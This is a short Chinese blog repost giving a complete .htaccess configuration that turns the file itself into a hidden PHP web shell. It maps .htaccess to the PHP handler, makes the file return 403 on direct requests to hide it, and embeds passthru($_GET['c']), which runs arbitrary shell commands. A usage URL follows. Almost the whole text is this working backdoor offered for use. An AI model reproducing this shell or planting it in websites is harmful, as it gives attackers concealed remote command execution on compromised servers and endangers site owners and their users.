用.htaccess做更隐蔽的后门

作者:kindle

From:http://key0.cn/?p=285

万恶的引用功能，下文复制粘贴无用，请自行将双引号修改

.htaccess内容如下

#首先允许web访问这个文件
<Files ~ “^\.ht”>
Order allow,deny
Allow from all
</Files>

RedirectMatch 403 .htaccess$
#.htaccess结尾的403错误，这里是为了增加隐蔽性

AddType application/x-httpd-php .htaccess
#给.htaccess映射php拓展

### SHELL ### <?php echo “\n”;passthru($_GET['c'].” 2>&1″); ?>### KINDLE ###
#恶意的php代码

使用方法:http://localhost/.htaccess/?c=dir

转载于:https://blog.51cto.com/pnig0s1992/570015